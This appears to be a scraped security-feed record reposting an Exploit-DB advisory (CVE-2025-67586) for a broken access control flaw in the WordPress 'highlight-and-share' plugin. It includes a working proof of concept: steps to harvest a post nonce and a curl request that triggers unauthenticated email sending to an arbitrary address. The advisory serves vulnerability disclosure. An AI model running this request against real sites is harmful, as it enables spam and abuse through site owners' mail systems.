{“lastseen”:”2026-04-22T13:27:57″,”description”:”Exploit Title: WordPress Plugin 5.2.0 – Broken Access Control Date: 2025-09-20 Exploit Author: Zeeshan Haider Vendor Homepage: https:\/\/wordpress.org\/plugins\/ Software Link: https:\/\/wordpress.org\/plugins\/highlight-and-share\/ Version: Description A…”,”published”:”2026-04-22T00:00:00″,”modified”:”2026-04-22T00:00:00″,”type”:”exploitdb”,”title”:”WordPress Plugin 5.2.0 – Broken Access Control”,”source”:””,”references”:””,”id”:”EDB-ID:52511″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-67586″],”sourceData”:”# Exploit Title: WordPress Plugin 5.2.0 – Broken Access Control\\r\\n# Date: 2025-09-20\\r\\n# Exploit Author: Zeeshan Haider\\r\\n# Vendor Homepage: https:\/\/wordpress.org\/plugins\/\\r\\n# Software Link: https:\/\/wordpress.org\/plugins\/highlight-and-share\/\\r\\n# Version: \\u003c= 5.2.0 (REQUIRED)\\r\\n# Tested on: WordPress 6.x, Kali Linux\\r\\n# CVE: CVE-2025-67586\\r\\n\\r\\n==\\u003e Description\\r\\nA broken access control vulnerability exists in a WordPress plugin developed by DLX Plugins.\\r\\nThe plugin exposes an unauthenticated AJAX action that allows attackers to abuse the\\r\\n\\”Share via Email\\” functionality without proper permission checks.\\r\\n\\r\\nAn unauthenticated attacker can reuse a valid post nonce to trigger email sharing requests,\\r\\nleading to unauthorized email sending (email spam \/ abuse) without user authentication.\\r\\n\\r\\n==\\u003e Privileges Required\\r\\nNone (Unauthenticated)\\r\\n\\r\\n\\r\\n==\\u003e Proof of Concept (PoC)\\r\\n\\r\\n\\u003e Step 1: Pick website with Installed Plugin \\r\\n\\r\\n\\u003e Step 2: Obtain a Valid Nonce\\r\\n 1. Open a public post.\\r\\n 2. Highlight text and click **Share via Email**.\\r\\n 3. Open Developer Tools \u2192 Network \u2192 XHR.\\r\\n 4. Send the email once.\\r\\n 5. Capture the request containing:\\r\\n action=has_email_social_modal\\r\\n nonce=\\u003cNONCE\\u003e\\r\\n post_id=\\u003cPOSTID\\u003e\\r\\n\\r\\nStep 3: Exploit via Unauthenticated Request\\r\\n\\r\\n\\u003e bash cmd: (replace website URL, post URL, and nonce)\\r\\n\\r\\ncurl -s -i -X POST ‘http:\/\/localhost\/wp-admin\/admin-ajax.php’ \\\\\\r\\n-d ‘action=has_email_form_submission’ \\\\\\r\\n-d ‘formData[postId]=\\u003cPOSTID\\u003e’ \\\\\\r\\n-d ‘formData[permalink]=http:\/\/localhost\/?p=\\u003cPOSTID\\u003e’ \\\\\\r\\n-d ‘formData[nonce]=\\u003cNONCE\\u003e’ \\\\\\r\\n-d ‘formData[toEmail]=attacker@example.com’ \\\\\\r\\n-d ‘formData[subject]=PoC’ \\\\\\r\\n-d ‘formData[shareText]=POC test’ \\\\\\r\\n-d ‘formData[emailShareType]=selection’ \\\\\\r\\n–compressed\\r\\n\\r\\n\\r\\n–\\u003e Expected JSON response:\\r\\n\\r\\n{\\r\\n\\”success\\”: true,\\r\\n\\”data\\”: {\\r\\n\\”errors\\”: false,\\r\\n\\”message_title\\”: \\”This post has been shared!\\”,\\r\\n\\”message_body\\”: \\”You have shared this post with attacker@example.com\\”,\\r\\n\\”message_subject\\”: \\”[Shared Post] \\u003cPOST TITLE\\u003e\\”,\\r\\n\\”message_source_name\\”: \\”Site Name\\”,\\r\\n\\”message_source_email\\”: \\”site@example.com\\”\\r\\n}\\r\\n}”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52511″,”cvss”:{“score”:5.3,”severity”:”MEDIUM”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:L\/I:N\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52511″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-22T13:27:57″,”description”:”Exploit Title: WordPress Plugin 5.2.0 – Broken Access Control Date: 2025-09-20 Exploit Author: Zeeshan Haider Vendor Homepage: https:\/\/wordpress.org\/plugins\/ Software Link: https:\/\/wordpress.org\/plugins\/highlight-and-share\/ Version: Description A…”,”published”:”2026-04-22T00:00:00″,”modified”:”2026-04-22T00:00:00″,”type”:”exploitdb”,”title”:”WordPress Plugin…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,22,12,40,21,13,7,11,5],"class_list":["post-48695","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-53","tag-exploit","tag-exploitdb","tag-medium","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n